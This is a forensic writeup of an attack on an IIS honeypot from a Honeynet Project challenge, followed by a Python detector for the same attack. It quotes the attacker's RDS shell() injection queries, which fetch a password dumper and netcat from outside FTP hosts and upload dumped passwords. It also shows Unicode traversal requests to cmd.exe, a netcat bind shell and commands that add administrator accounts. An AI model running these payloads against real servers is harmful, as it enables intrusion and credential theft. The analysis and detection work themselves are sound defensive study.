From alterego@in-box.net Fri Apr 20 20:29:32 2001
Date: Wed, 4 Apr 2001 06:55:27 -0400
From: alterego@in-box.net
To: project@honeynet.org
Subject: Scan of the Month - April

This is my first look at a log of an NT system, and my Windows experience is woefully limited to playing games.

Assumptions: the events in the log are sequential in order from top to bottom.

a) Which exploit(s) were used to attack the system?

It looked like the MSADC/RDS exploit script by rain forest puppy, based on the ADM signature and the request headers. Also, the Unicode exploit was used to create a netcat download and shell script.

b) How were the exploits used to access and control the system?

The MSADC/RDS exploit makes use of the RDS vulnerability in IIS, allowing remote queries via RDS and embedding NT command line commands inside those queries. No active database and user IDs are needed, as a connection is made to a database installed by default in Option Pack 4, %systemroot%\help\iis\htm\tutorial\btcustmr.mdb.

  Select * from Customers where City='|shell("cmd /c echo werd >> c:\fun")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo user johna2k > ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo hacker2000 >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get samdump.dll >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get pdump.exe >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get nc.exe >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo quit >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c ftp -s:ftpcom -n www.nether.net")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c pdump.exe >> new.pass")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo user johna2k > ftpcom2")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo hacker2000 >> ftpcom2")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c put new.pass >> ftpcom2")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo quit >> ftpcom2")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c ftp -s:ftpcom2 -n www.nether.net")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c ftp 213.116.251.162")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo open 213.116.251.162 > ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo johna2k > ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo hacker2000 >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get samdump.dll >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get pdump.exe >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get nc.exe >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo quit >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c ftp -s:ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c open 212.139.12.26")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo johna2k >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo haxedj00 >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get pdump.exe >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get samdump.dll >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get nc.exe >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo quit >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c ftp -s:sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c open 213.116.251.162")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo johna2k >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo haxedj00 >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get pdump.exe >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get samdump.dll >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo get nc.exe >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c echo quit >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c ftp -s:sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

For some reason, it was not able to start the ftp. Perhaps due to the space between >> and the filename?

The Unicode exploit works by using the Unicode sequence %c0%af in place of '/' to perform directory traversals, e.g. "/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0".
  GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1
  GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1
  . . .
  GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1

This works, and a netcat executable was ftp'd over and bound to port 6969, i.e.

  GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe

c) What was done once access was gained?

Short version: basically get passwords, system information, administrator rights, configuration data, and explore the system for interesting stuff to retrieve.

Long version: he tried

1) pdump.exe >> c:\yay.txt to get passwords
2) net session >>yay2.txt and yay3.txt to get sessions
3) net users >>heh.txt to get user lists
4) typed a message to the admin in README.NOW.HAXOR to patch the holes.

Somewhere in between he enters an exploits directory, with microsoft, newfiles and unix directories.
5) Tried to escalate privileges by using RDS commands:

  Select * from Customers where City='|shell("cmd /c net localgroup Domain Admins IWAM_KENNY /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c net localgroup Domain Admins IUSR_KENNY /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c net localgroup administrators IUSR_KENNY /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c net localgroup administrators IWAM_KENNY /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c net user testuser UgotHacked /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  Select * from Customers where City='|shell("cmd /c net localgroup Administrators testuser /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

After playing around with the net commands, he decided to delete the exploit files and password dumper. Next he ran rdisk -s to save his changes to the rescue disk configuration. From what I can make out from the mess, there are a few "access denied" results.

6) After that he used RDS to execute his commands.

  Select * from Customers where City='|shell("cmd /c rdisk -s")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

In fact he tried it a few times, varying the positions of the '-', '/' and 's', between dir commands, maybe because the commands were not changing any of the date stamps. It finally changed when he tried rdisk /s-.

7) Tried to make a copy of the sam file.
  Select * from Customers where City='|shell("cmd /c type c:\winnt\repair\sam._ >>c:\har.txt")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

Did a dir and bingo, har.txt.

8) Typed a few commands that were not successful, but I can't make out what they were. Did see exit somewhere, followed by a Unicode exploit to start netcat again.

9) Later he starts another netcat session at port 6968. He tries a net session but fails. Later he tries to access a shared file, and failing that, enters a directory wiretrip with nasty weapons like msadc1.pl and msadc2.pl, and some evil-sounding DoS source code like RFParalyze.c and RFPoison.c. There are also archives of the whisker web scanner.

10) Next he visits a few directories, including inetpub and the wwwroot inside it. Is that Rain Forest Puppy's page in there? He copies the har.txt file he created there and tries to get it. He tries to del it after that. Doesn't seem to work, as it appears the next time he does a dir. After trying a few times, he gives up and uses RDS to do it.

  Select * from Customers where City='|shell("cmd /c del c:\inetpub\wwwroot\har.txt")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

Poor guy, he can't seem to get rid of it.

11) Enters the guest directory. Tries to map out the possible partitions and disks by doing dir from d: onwards. At least it looked that way. Did a listing of the c:\temp directory.

12) Runs nc at port 6968 again using Unicode. Takes a look around and checks yay.txt. Later he creates a new directory called test. Goes digging in the exploits directories. Looks like a script kiddie's armoury there. Types a message to the admin telling him that's the best honeypot he has seen so far. Probably due to lack of user activity.

13) After a few failed attempts to retrieve his readme, he explores the exploits directory and its contents. Seemed to be interested in some of the contents, for example a DNS scanner and an IRC sequencer. Does quite a bit of exploring again of the drive layout. Hmm, the pages retrieved seem to indicate that this is Rain Forest Puppy's home page?

14) Tries another RDS:

  Select * from Customers where City='|shell("cmd /c net user IWAM_KENNY Snake69Snake69")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

Must have realized something horrifying, as he types 'This can't be true' into a text file in the wwwroot directory and retrieves it. Deletes the test directory he created in the root directory.

15) Echoes something into the default.htm.

16) Hmmm, a new attempt to copy the cmd file. Fails because the process is running. Uses the Unicode exploit to craft an ftp script to put the whiskers.tar.gz to his server. Binds an nc to port 6969.

17) Cleans up by sending a Unicode request to del the ftpcom script file.

18) Reads the guest books. Okay, it is RFP's web page.

d) How could this attack have been prevented?

Basically, those who don't need RDS would need to upgrade MDAC, run HANDSAFE.EXE to set the registry and safe handlers, and prevent people from using RDS remotely by removing the /msadc/ virtual root. Those who do can upgrade the MDAC, use custom handlers and delete the VbBusObj references from the registry. For the Unicode exploit, patches are available from Microsoft.

e) How much time did you spend on this analysis and writeup?

1 day.

Bonus Question: Do you feel that the attacker in question knew if this was a honeypot? If so, why or why not?

Yes. He left a text file complimenting the honeypot. Probably due to lack of user activity, or he read the guest book ;)
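Added example, not part of the submission above or of the Honeynet Project's material: it shows why the %c0%af traversal described in section b) gets past a check for ".." segments, and runs a small detector for the three things the writeup identifies (the Unicode traversal to cmd.exe, the netcat bind shell, and the RDS shell() injection) over constructed request records built from the request strings quoted above. The record layout, the RDS endpoint path /msadc/msadcs.dll/AdvancedDataFactory.Query, and the "naive" check used for contrast are assumptions made for this example; the honeynet data was a packet capture, not an IIS log, so a real detector would take its input from a sniffer rather than from these dictionaries.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed request records modelled on the strings quoted in the writeup.
# The RDS endpoint path (msadcs.dll/AdvancedDataFactory.Query) and the record
# layout are assumptions made for this example; the POST body is invented
# from the query text in the writeup.
SAMPLE_RECORDS = [
    {"method": "GET",
     "uri": r"/msadc/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe"
            r"?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe"},
    {"method": "GET",
     "uri": "/msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/"
            "common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe"},
    {"method": "POST",
     "uri": "/msadc/msadcs.dll/AdvancedDataFactory.Query",
     "body": r'''Select * from Customers where City='|shell("cmd /c echo werd >> c:\fun")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;'''},
    {"method": "GET", "uri": "/default.htm"},
]

# The injected command sits between |shell(" and ")| in the RDS query.
RDS_SHELL = re.compile(r'\|shell\("([^"]*)"\)\|')


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 but accept overlong forms such as C0 AF.

    Python's strict decoder rejects C0 AF; the IIS path-mapping code accepted
    it and produced '/', which is the whole trick. Bad bytes become U+FFFD.
    """
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        if 0xC0 <= b <= 0xDF:
            need, cp = 1, b & 0x1F
        elif 0xE0 <= b <= 0xEF:
            need, cp = 2, b & 0x0F
        elif 0xF0 <= b <= 0xF7:
            need, cp = 3, b & 0x07
        else:
            out.append("\ufffd")
            i += 1
            continue
        tail = data[i + 1:i + 1 + need]
        if len(tail) == need and all(0x80 <= c <= 0xBF for c in tail):
            for c in tail:
                cp = (cp << 6) | (c & 0x3F)   # overlong: C0 AF -> 0x2F, '/'
            out.append(chr(cp))
            i += 1 + need
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def naive_traversal_check(stem: str) -> bool:
    """Percent-decode once and reject any literal '..' segment (an assumed
    approximation of the check the traversal slipped past). True means 'safe'."""
    return b".." not in unquote_to_bytes(stem).split(b"/")


def resolve(stem: str):
    """Percent-decode, then lenient-UTF-8-decode, then walk the segments.
    Returns (escaped_webroot, resolved_path)."""
    decoded = lenient_utf8_decode(unquote_to_bytes(stem))
    segs, escaped = [], False
    for seg in re.split(r"[\\/]+", decoded):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segs:
                segs.pop()
            else:
                escaped = True          # climbed above the virtual root
        else:
            segs.append(seg)
    return escaped, "/" + "/".join(segs)


def scan(records):
    """Return (index, kind, detail) findings for traversal, bind shell and RDS shell()."""
    findings = []
    for n, rec in enumerate(records):
        stem, _, query = rec["uri"].partition("?")
        escaped, resolved = resolve(stem)
        if escaped:
            findings.append((n, "unicode-traversal", resolved))
        tokens = query.replace("+", " ").split()   # e.g. /c nc -l -p 6969 -e cmd1.exe
        if "nc" in tokens and "-e" in tokens and "-p" in tokens:
            i = tokens.index("-p")
            port = tokens[i + 1] if i + 1 < len(tokens) else "?"
            findings.append((n, "bind-shell", port))
        if rec["method"] == "POST" and "/msadc/msadcs.dll" in stem.lower():
            for m in RDS_SHELL.finditer(rec.get("body", "")):
                findings.append((n, "rds-shell", m.group(1)))
    return findings


if __name__ == "__main__":
    stem = SAMPLE_RECORDS[0]["uri"].partition("?")[0]
    print("naive check says safe:", naive_traversal_check(stem))
    print("resolves to:", resolve(stem))
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

The contrast worth noticing is that naive_traversal_check() passes the first record while resolve() shows it climbing five levels above the root to cmd.exe: the "../" the eye sees in "..%C0%AF../" is not a standalone ".." segment until the overlong byte pair has been turned into a slash, so any filter that runs before that decoding step is blind to it. Decoding to the same form the target will eventually use, then checking, is the general fix.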